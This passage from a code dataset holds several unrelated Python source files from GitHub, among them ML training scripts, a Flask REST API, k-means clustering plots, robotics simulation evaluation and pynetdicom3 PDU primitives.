coeff_df.reset_index(drop=True)","repo_name":"jzivic/Titanic_project","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70784761288","text":"import logging\nfrom dataclasses import dataclass\n\nimport pandas as pd\nfrom lit_ds_utils.decorate.logging import log_function\nfrom sklearn.model_selection import train_test_split\n\nfrom .. import settings\nfrom ..config.constants import (\n DATABRICKS_EXPERIMENT_NAME,\n DATABRICKS_GROUP_NAME,\n DATABRICKS_REGISTERED_MODEL_NAME,\n MODEL_ARTIFACT,\n)\nfrom ..utils.utils import save_local_artifact\nfrom .build import build_model\nfrom .log_model import wrap_and_log_model\n\nlogger = logging.getLogger(__name__)\n\nEXPERIMENT_NAME = settings.str(DATABRICKS_EXPERIMENT_NAME)\nMODEL_NAME = settings.str(DATABRICKS_REGISTERED_MODEL_NAME)\nGROUP_NAME = settings.str(DATABRICKS_GROUP_NAME)\n\n\n@dataclass()\nclass TrainTestSplits:\n \"\"\"Train, test and holdout splits.\"\"\"\n\n train_df: pd.DataFrame\n test_df: pd.DataFrame\n\n\n@log_function()\ndef train_and_log_model(train_df: pd.DataFrame, test_df: pd.DataFrame) -> None:\n \"\"\"Run an ML Flow experiment and log to databricks using the args sent in.\n\n Args:\n train_df: Train df\n test_df: Test df.\n \"\"\"\n logger.info(\"Building model\")\n model = build_model(train_df=train_df)\n save_local_artifact(MODEL_ARTIFACT, model)\n\n logger.info(\"Logging model to MLFlow\")\n wrap_and_log_model(model, test_df=test_df)\n\n\n@log_function()\ndef get_train_test_splits(input_df: pd.DataFrame) -> TrainTestSplits:\n \"\"\"Split the supplied data into training, test and holdout splits.\n\n Args:\n input_df: The dataframe to split.\n\n Returns:\n The train, test and holdout splits.\n \"\"\"\n\n train_df = input_df[input_df['policy_year'] < 2017]\n test_df = input_df[input_df['policy_year'] == 2017]\n\n return TrainTestSplits(train_df, test_df)\n","repo_name":"judemd/ml-playground","sub_path":"ml-template-main/pipeline/model/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36780865148","text":"import re, bs4, string\nfrom project.server.main.parsers.strings import get_clean_text\n\ndef parse_fallback_tags(soup, doi):\n\n res = {'doi': doi}\n affiliations = []\n affiliation_regex = re.compile(\"affili|institution\")\n potential_elts = []\n potential_elts += soup.find_all(id= affiliation_regex) \n potential_elts += soup.find_all(class_= affiliation_regex)\n\n potential_aff = []\n\n for p in potential_elts:\n current_name = get_clean_text(p)\n potential_aff.append(current_name)\n\n #for e in soup.find_all(\"sup\"):\n # if len(get_clean_text(e)) == 1:\n # potential_aff.append(get_clean_text(e.next.next))\n\n for current_name in potential_aff:\n for k in [\"Affiliation\", \"Author Information\"]:\n current_name = current_name.replace(k, \"\").strip()\n if current_name.startswith(';'):\n continue\n if len(current_name.split(' ')) < 2:\n continue\n if len(current_name) > 2:\n current_aff = {'name': current_name}\n if current_aff not in affiliations:\n affiliations.append(current_aff)\n if affiliations:\n res['affiliations'] = affiliations\n\n return res\n","repo_name":"dataesr/bso-parser-html","sub_path":"project/server/main/parsers/fallback_tags.py","file_name":"fallback_tags.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11899500140","text":"from flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom app.db import db\n\nfrom app.countries.models import Country\nfrom .models import University\n\n\nbp = Blueprint('universities', __name__, url_prefix='/universities')\n\n\nclass UniversityBaseView(MethodView):\n def is_column_unique(self, column, value): \n \"\"\"\n Example:\n 'world_rank', 98, \n 'name', 'Some university'\n \"\"\"\n return University.query.filter_by(**{column: value}).first() is None\n\n def is_name_unique(self, name):\n return University.query.filter_by(name=name).first() is None\n\n def get_country(self, country_id):\n return Country.query.filter_by(id=country_id).first()\n\n def validate_data(self, data):\n fields = {\n 'name': str,\n 'world_rank': int,\n 'score': float,\n 'country_id': int,\n }\n\n errors = {}\n for field, _type in fields.items():\n try:\n data[field] = _type(data[field])\n except (KeyError, TypeError, ValueError):\n errors[field] = 'invalid'\n \n return data, errors\n\n\nclass UniversityListCreateView(UniversityBaseView):\n def get(self):\n limit = 20\n\n rows = University.query.limit(limit)\n\n page = request.args.get('page', '1')\n if page and page.isnumeric():\n page = int(page)\n rows = rows.offset((page - 1) * limit)\n\n response = [{'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id} for row in rows]\n\n return jsonify(response)\n\n def post(self):\n data = request.json\n\n data, errors = self.validate_data(request.json)\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n if not self.is_column_unique('name', data['name']):\n errors['name'] = 'unique'\n \n if not self.is_column_unique('world_rank', data['world_rank']):\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n u = University(\n name=data['name'], \n world_rank=data['world_rank'], \n score=data['score'],\n country_id=data['country_id'],\n )\n db.session.add(u)\n db.session.commit()\n db.session.refresh(u)\n\n return jsonify({'id': u.id}), 201 # created\n\n\nclass UniversityDetailUpdateDeleteView(UniversityBaseView):\n def get_object_by_id(self, university_id):\n return University.query.filter_by(id=university_id).first()\n\n def get(self, university_id):\n row = self.get_object_by_id(university_id)\n if row is None:\n return jsonify({'error': 'not_found'}), 404\n\n return jsonify({'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id})\n\n def put(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n \n data, errors = self.validate_data(request.json)\n \n if len(errors):\n return jsonify({'error': errors}), 400\n\n if University.query.filter(University.id != university_id).filter_by(name=data['name']).first():\n errors['name'] = 'unique'\n\n if University.query.filter(University.id != university_id).filter_by(world_rank=data['world_rank']).first():\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n university.name=data['name']\n university.world_rank=data['world_rank']\n university.score=data['score']\n university.country_id=data['country_id']\n \n db.session.commit()\n\n return jsonify({'id': university.id}), 200 # created\n\n def delete(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n\n db.session.delete(university)\n db.session.commit()\n\n return jsonify({'deleted': 'ok'})\n\n\nbp.add_url_rule('/', view_func=UniversityListCreateView.as_view('universities'))\nbp.add_url_rule('//', view_func=UniversityDetailUpdateDeleteView.as_view('university'))\n","repo_name":"Argam431/RESTFULL-Api","sub_path":"app/universities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70330457928","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial.distance import cdist, pdist\nfrom sklearn.cluster import KMeans\n\n# CHARACTER_DATA_FILE = './spambase.data'\n# char_data = pd.read_csv(CHARACTER_DATA_FILE)\n# char_x = char_data[[x for x in char_data.columns if x != \"spam\"]]\n\nraw_data = pd.read_csv('spambase.data', sep = ',', header=None) # 4601 instances\nchar_x = raw_data.drop([57], axis=1)\n# labels = raw_data[[57]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 3680 + 921 instances\n\n# WINE_DATA_FILE = './satellite.data'\n# wine_data = pd.read_csv(WINE_DATA_FILE)\n# wine_x = wine_data[[x for x in wine_data.columns if x != \"quality\"]]\nraw_data = pd.read_csv('satellite.data', sep = ' ', header=None) # 6435 instances\nwine_x = raw_data.drop([36], axis=1)\n# labels = raw_data[[36]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 5148 + 1287 instances\n\n\n\n\n\n\n\n# Train kmean models, once for each value of k (aka create k clusters ea time)\nK = range(1, 40)\nKM_c = [KMeans(n_clusters=k).fit(char_x) for k in K]\nKM_w = [KMeans(n_clusters=k).fit(wine_x) for k in K]\nprint(\"Trained kmean models\")\n\n# For ea val of k, find centroids of ea of their clusters\ncentroids_c = [km.cluster_centers_ for km in KM_c]\ncentroids_w = [km.cluster_centers_ for km in KM_w]\nprint(\"Found the centroids\")\n\n# Calc euclid dist from data pt to center of cluster it belongs to\nDk_c = [cdist(char_x, center, 'euclidean') for center in centroids_c]\nDk_w = [cdist(wine_x, center, 'euclidean') for center in centroids_w]\nprint(\"Calculated euclidean distance\")\n\ncIdx_c = [np.argmin(D, axis=1) for D in Dk_c]\ndist_c = [np.min(D, axis=1) for D in Dk_c]\navgWithinSS_c = [sum(d) / char_x.shape[0] for d in dist_c]\n\n# Total with-in sum of square\nwcss_c = [sum(d**2) for d in dist_c]\ntss_c = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_c = tss_c - wcss_c\ncIdx_w = [np.argmin(D, axis=1) for D in Dk_w]\ndist_w = [np.min(D, axis=1) for D in Dk_w]\navgWithinSS_w = [sum(d) / char_x.shape[0] for d in dist_w]\n\n# Total with-in sum of square\nwcss_w = [sum(d**2) for d in dist_w]\ntss_w = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_w = tss_w - wcss_w\nprint(\"Calculated sum of square errors\")\nkIdx_c = 9\nkIdx_w = 4\nplt.style.use('ggplot')\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_c, '*-', label='Spambase')\nax.plot(K[kIdx_c], avgWithinSS_c[kIdx_c], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='r', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow1.png')\nplt.show()\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_w, '*-', label='Satellite')\nax.plot(K[kIdx_w], avgWithinSS_w[kIdx_w], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='b', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow2.png')\nplt.show()\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_c / tss_c * 100, '*-', label='Spambase')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow3.png')\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_w / tss_w * 100, '*-', label='Satellite')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow4.png')\nplt.show()","repo_name":"jpan68/ML-datasets","sub_path":"HW3 - Unsupervised Learning & Dimensionality Reduction/clustering_kmeans.py","file_name":"clustering_kmeans.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71227335048","text":"from django.urls import path\nfrom blogapp import views # импортируем вьюшки\n\n\napp_name = 'blogapp'\n\nurlpatterns = [\n path('', views.main_view, name='index'),\n path('create/', views.create_post, name='create'),\n path('post//', views.post, name='post')\n]\n","repo_name":"DmitriChe/django-blog20_orm","sub_path":"blog/blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2598405509","text":"\"\"\"\nTest for file IO\n\"\"\"\nimport os\n\nfrom bioptim import PhaseDynamics\nimport numpy as np\nimport pytest\n\n\n@pytest.mark.parametrize(\"phase_dynamics\", [PhaseDynamics.SHARED_DURING_THE_PHASE, PhaseDynamics.ONE_PER_NODE])\ndef test_double_pendulum_torque_driven_IOCP(phase_dynamics):\n # Load double pendulum ocp\n from bioptim.examples.inverse_optimal_control import double_pendulum_torque_driven_IOCP as ocp_module\n\n bioptim_folder = os.path.dirname(ocp_module.__file__)\n biorbd_model_path = bioptim_folder + \"/models/double_pendulum.bioMod\"\n\n ocp = ocp_module.prepare_ocp(\n weights=[0.4, 0.3, 0.3],\n coefficients=[1, 1, 1],\n biorbd_model_path=biorbd_model_path,\n phase_dynamics=phase_dynamics,\n n_threads=4 if phase_dynamics == PhaseDynamics.SHARED_DURING_THE_PHASE else 1,\n expand_dynamics=True,\n )\n\n sol = ocp.solve()\n\n # Check constraints\n g = np.array(sol.constraints)\n\n # Check some of the results\n states, controls = sol.states, sol.controls\n q, qdot, tau = states[\"q\"], states[\"qdot\"], controls[\"tau\"]\n\n np.testing.assert_equal(g.shape, (120, 1))\n np.testing.assert_almost_equal(g, np.zeros((120, 1)))\n\n # Check objective function value\n f = np.array(sol.cost)\n np.testing.assert_equal(f.shape, (1, 1))\n np.testing.assert_almost_equal(f[0, 0], 13.03787939)\n\n # initial and final position\n np.testing.assert_almost_equal(q[:, 0], np.array([-3.14159265, 0.0]))\n np.testing.assert_almost_equal(q[:, -1], np.array([3.14159265, 0.0]))\n\n # initial and final velocities\n np.testing.assert_almost_equal(qdot[:, 0], np.array([-3.32315017, 15.70796327]))\n np.testing.assert_almost_equal(qdot[:, -1], np.array([3.0362723, -2.87576071]))\n\n # initial and final controls\n np.testing.assert_almost_equal(tau[:, 0], np.array([-11.49023683]))\n np.testing.assert_almost_equal(tau[:, -2], np.array([0.04617407]))\n","repo_name":"pyomeca/bioptim","sub_path":"tests/shard2/test_global_inverse_optimal_control.py","file_name":"test_global_inverse_optimal_control.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"16"}
+{"seq_id":"34762652298","text":"# Dependencies\r\nimport csv \r\n#csv read\r\nwith open ('budget_data.csv') as csvfile: \r\n\r\n csvreader=csv.reader(csvfile, delimiter=',') \r\n header=next(csvreader) \r\n\r\n #Variables and Conditions\r\n months=[] \r\n prolosses=[] \r\n\r\n \r\n total=0\r\n a_change=0\r\n m_change=0\r\n m_count=0\r\n delta1=0\r\n delta2=0\r\n delta_line1=0\r\n delta_line2=0\r\n loop1=0\r\n loop2=0\r\n\r\n #Read\r\n for row in csvreader:\r\n month=row[0] \r\n proloss=row[1] \r\n months.append(month) \r\n prolosses.append(proloss) \r\n \r\n m_count = len(months) \r\n\r\n\r\n#analysis\r\n\r\n#loop1\r\nfor loop1 in range (m_count):\r\n total=total+int(prolosses[loop1]) \r\n\r\n#loop2 (calculation)\r\nfor loop2 in range (m_count-1): #Restrict loop to avoid overflow (last line +1)\r\n a_change=a_change+(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n\r\n m_change=(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n if m_change>delta1: \r\n delta1=m_change\r\n delta_line1=loop2\r\n else:\r\n delta1=delta1\r\n\r\n if m_change key:\n j -= 1\n else:\n i += 1\n return -1\n\n\narray = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 52]\n]\n\nprint(search(array, 52))","repo_name":"pulkitmunjral/DSA_python","sub_path":"Other/searchin2dSortedarray.py","file_name":"searchin2dSortedarray.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40959661603","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport sys, os\nimport math\nimport pybullet_data\nimport scipy.misc\nfrom skimage.draw import line, polygon\nfrom custom_utils import load_model, TURTLEBOT_URDF, joints_from_names, \\\n set_joint_positions, HideOutput, get_bodies, sample_placement, pairwise_collision, \\\n set_point, Point, create_box, stable_z, TAN, GREY, connect, PI, OrderedSet, \\\n wait_if_gui, dump_body, set_all_color, BLUE, child_link_from_joint, link_from_name, draw_pose, Pose, pose_from_pose2d, \\\n get_random_seed, get_numpy_seed, set_random_seed, set_numpy_seed, plan_joint_motion, plan_nonholonomic_motion, \\\n joint_from_name, safe_zip, draw_base_limits, BodySaver, WorldSaver, LockRenderer, elapsed_time, disconnect, flatten, \\\n INF, wait_for_duration, get_unbuffered_aabb, draw_aabb, DEFAULT_AABB_BUFFER, get_link_pose, get_joint_positions, \\\n get_subtree_aabb, get_pairs, get_distance_fn, get_aabb, set_all_static, step_simulation, get_bodies_in_region, \\\n AABB, update_scene, Profiler, pairwise_link_collision, BASE_LINK, get_collision_data, draw_pose2d, \\\n normalize_interval, wrap_angle, CIRCULAR_LIMITS, wrap_interval, Euler, rescale_interval, adjust_path, WHITE, RED, \\\n sample_pos_in_env, remove_body, get_euler, get_point, get_config, reset_sim, set_pose, get_quat,euler_from_quat, \\\n quat_from_euler, pixel_from_point, create_cylinder, create_capsule, create_sphere\nclass Eval:\n def __init__(self, sim, utils):\n self.sim = sim\n self.utils = utils\n self.success_list = []\n self.reward_list = []\n self.run_length_list = []\n self.path_length_list = []\n self.current_path_length = 0\n self.current_path = []\n self.current_initial_image = None\n self.global_count = 0\n\n def evaluation_reset(self):\n which_obstacle = self.sim.evaluation_sample[\"obstacle_scenario_id\"]\n self.utils.choose_obstacle_build(which_obstacle)\n self.utils.reset_obj_fix(self.sim.pushing_object_id, self.sim.evaluation_sample[\"start\"])\n self.sim.step_simulation(self.sim.per_step_iterations)\n self.sim.current_obj_conf = get_config(self.sim.pushing_object_id, self.sim._p, self.sim.client_id)\n self.sim.last_obj_conf = self.sim.current_obj_conf\n self.sim.goal_obj_conf = self.sim.evaluation_sample['goal']\n arm_pose = self.sim.evaluation_sample['gripper']\n _, self.sim.current_depth_img, self.sim.current_true_depth = self.utils.get_image()\n self.sim.initial_true_depth = self.sim.current_true_depth\n self.sim.initial_image_processed = self.utils.process_initial_image(self.sim.current_depth_img, self.sim.current_obj_conf)\n target_joint_states = self.sim.get_ik_joints(arm_pose[0], euler_from_quat(arm_pose[1]),\n self.sim._robot_tool_center)[:6]\n self.sim._reset_arm_fixed(target_joint_states)\n\n def write_evaluation_RL(self, Done, reward):\n if Done:\n if self.sim.target_reached:\n self.success_list.append(True)\n else: self.success_list.append(False)\n self.reward_list.append(reward)\n self.run_length_list.append(self.sim.current_steps)\n self.sim.contact_frames.append(self.sim.has_contact)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n def straight_pushing_eval_RL(self, Done, current_pose, last_pose, img):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n self.straight_pushing_picture_RL(img)\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def straight_pushing_picture_RL(self, img):\n img = self.sim.initial_path_img.copy()\n black_pixels_mask = np.all(img == [0, 0, 0], axis=-1)\n img[black_pixels_mask] = [255, 255, 255]\n for p in self.current_path:\n p_1 = self.utils.get_pos_in_image(p[0])\n p_2 = self.utils.get_pos_in_image(p[1])\n img = cv2.line(img, (p_1[0], p_1[1]), (p_2[0], p_2[1]), [255,0,0], 2)\n cv2.imwrite(self.evaluation_save_path + \"path_img_\" + str(self.global_count) + \".png\", img)\n\n def write_evaluation_baseline(self, reached):\n if reached: self.success_list.append(True)\n else: self.success_list.append(False)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.current_path_length), self.sim.evaluation_save_path + \"real_path_length_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n\n def straight_pushing_eval_baseline(self, Done, current_pose, last_pose):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n # self.astar_deviation()\n self.straight_pushing_picture_baseline()\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def astar_deviation(self, plot=False):\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1)\n\n #cut astar path when target is in reach\n goal = np.flip(self.temp(self.sim.goal_obj_conf[0]))\n distances = np.sqrt(np.square(goal[0] - self.sim.baseline.path[:, 0]) + np.square(goal[1] - self.sim.baseline.path[:, 1]))\n till = np.min(np.argwhere(distances < self.sim.baseline.target_reached_thres*256))\n path = self.sim.baseline.path[0:max(till, 1)]\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n self.path_deviation = num_fill/(np.power(2., 16.)*np.power(10., -4.)) #in square centimeters\n print(\"number of cells: \", num_fill)\n print(\"space: {} cm^2\".format(self.path_deviation))\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def theta_star_deviation(self, plot=False):\n path = self.sim.initial_shortest_path\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1) #???\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n print(\"number of cells: \", num_fill)\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def temp(self,coords):\n pos = np.asarray([0, 0], dtype=int)\n # pos[1] = int((coords[0] + 0.5) * 256 / 1) # int((coords[0] + 0.45)*255/0.9) #\n # pos[0] = int((coords[1] + 0.9) * 256 / 1) # int((coords[1] + 0.75)*127/0.45)#\n # pos[0] = int((coords[0] + 0.5)*(self.workspace_size[0] - 1)/1) #int((coords[0] + 0.45)*255/0.9) #\n pos[0] = int((coords[0] + 0.907/2)*(256 - 1)/0.907) #int((coords[0] + 0.45)*255/0.9) #\n # pos[1] = int((coords[1] + 0.9)*(self.workspace_size[1] - 1)/1) #int((coords[1] + 0.75)*127/0.45)#\n pos[1] = int((coords[1] + 0.903)*(256 - 1)/0.903) #int((coords[1] + 0.75)*127/0.45)#\n return pos\n\n def rev_temp(self, coords):\n pos = np.asarray([0,0], dtype=float)\n # pos[0] = (1/2)*(1.2/256) + coords[0]/256*1 - 0.5\n # pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.9\n # pos[0] = (1/2)*(1.2/self.workspace_size[0]) + coords[0]/self.workspace_size[0]*1 - 0.5\n pos[0] = (1/2)*(1/256) + coords[0]/256*1 - 0.907/2\n # pos[1] = (1/2)*(1/self.workspace_size[1]) + coords[1]/self.workspace_size[1]*1 - 0.9\n pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.903\n return pos\n\n def straight_pushing_picture_baseline(self):\n img = self.sim.baseline.initial_path_img.copy()\n for p in self.current_path:\n p_1 = self.temp(p[0])#self.utils.get_pos_in_image(np.append(p[0], [0.025]))\n p_2 = self.temp(p[1])#self.utils.get_pos_in_image(np.append(p[1], [0.025]))\n img = cv2.line(img, (p_2[0], p_2[1]), (p_1[0], p_1[1]), [255,0,255], 2)\n cv2.imwrite(self.sim.evaluation_save_path + \"path_img_\"+ str(self.global_count) + \".png\", img)\n\n","repo_name":"btabia/residual-pushing","sub_path":"push_gym/push_gym/evaluation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36213041028","text":"import time\r\n\r\nnome = None\r\n\r\ndef bemVindo():\r\n global nome\r\n nome = input('Insira seu nome: ')\r\n\r\n confirm = input('Isso está correto? \"{}\" S/N >'.format(nome)).lower()\r\n\r\n if confirm == 's':\r\n nome = nome\r\n else:\r\n bemVindo()\r\n\r\nbemVindo()\r\n\r\ntime.sleep(1)\r\nprint('Bem vindo, ',nome)\r\n\r\n\r\n\r\n\r\n","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"74952360328","text":"import sys\n\n# read file\ndata = sys.stdin.readlines()\n\n# clean\nclean_data = [[int(i.strip()) for i in line.strip()] for line in data]\n\ndata = clean_data\n\n# process\ngamma, epsilon = [], []\nones, zeros = 0, 0\n\nfor i in range(len(data[0])):\n for j in data:\n if j[i] == 0:\n zeros += 1\n else:\n ones += 1\n\n if zeros > ones:\n gamma.append(\"0\")\n epsilon.append(\"1\")\n\n else:\n gamma.append(\"1\")\n epsilon.append(\"0\")\n\n zeros, ones = 0, 0\n\n\ngamma = int(\"\".join(gamma), base=2)\nepsilon = int(\"\".join(epsilon), base=2)\n\nprint(gamma * epsilon)\n","repo_name":"gotche/advent_of_code","sub_path":"03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8213600371","text":"\"\"\"\nImplementaion of the service parameter primitives.\n\"\"\"\nimport codecs\nimport logging\n\nfrom pydicom.uid import UID\n\nfrom pynetdicom3.pdu import (MaximumLengthSubItem,\n ImplementationClassUIDSubItem,\n ImplementationVersionNameSubItem,\n AsynchronousOperationsWindowSubItem,\n SCP_SCU_RoleSelectionSubItem,\n SOPClassExtendedNegotiationSubItem,\n SOPClassCommonExtendedNegotiationSubItem,\n UserIdentitySubItemRQ,\n UserIdentitySubItemAC)\nfrom pynetdicom3.utils import validate_ae_title, PresentationContext\n#from pynetdicom3.utils import pretty_bytes\n\nLOGGER = logging.getLogger('pynetdicom3.pdu_primitives')\n\n\nclass ServiceParameter(object):\n \"\"\" Base class for Service Parameters \"\"\"\n\n def __eq__(self, other):\n \"\"\"Equality of two ServiceParameters\"\"\"\n if isinstance(other, self.__class__):\n return other.__dict__ == self.__dict__\n\n return False\n\n def __ne__(self, other):\n \"\"\"Inequality of two ServiceParameters\"\"\"\n return not self == other\n\n def from_primitive(self):\n \"\"\"FIXME\"\"\"\n raise NotImplementedError\n\n def FromParams(self):\n \"\"\"FIXME\"\"\"\n return self.from_primitive()\n\n\n# Association Service primitives\nclass A_ASSOCIATE(object):\n \"\"\"\n A-ASSOCIATE Parameters\n\n The establishment of an association between two AEs shall be performed\n through ACSE A-ASSOCIATE request, indication, response and confirmation\n primitives.\n\n The initiator of the service is called the Requestor and the user that\n receives the request is the Acceptor.\n\n See PS3.8 Section 7.1.1\n\n The A-ASSOCIATE primitive is used by the DUL provider to send/receive\n information about the association. It gets converted to \n A-ASSOCIATE-RQ, -AC, -RJ PDUs that are sent to the peer DUL provider and \n gets deconverted from -RQ, -AC, -RJ PDUs received from the peer.\n\n It may be better to simply extend this with methods for containing\n the -rq, -ac, -rj possibilities rather than creating a new\n AssociationInformation class, but it would require maintaining the instance\n across the request-accept/reject path\n\n -rq = no Result value\n -ac = Result of 0x00\n -rj = Result != 0x00\n\n ::\n\n Parameter Request Indication Response Confirmation\n app context name M M(=) M M(=)\n calling ae title M M(=) M M(=)\n called ae title M M(=) M M(=)\n user info M M(=) M M(=)\n result M M(=)\n source M\n diagnostic U C(=)\n calling pres add M M(=)\n called pres add M M(=)\n pres context list M M(=)\n pres list result M M(=)\n\n mode UF MF(=)\n resp ae title MF MF(=)\n resp pres add MF MF(=)\n pres and sess req UF UF(=) UF UF(=)\n\n U - User option\n 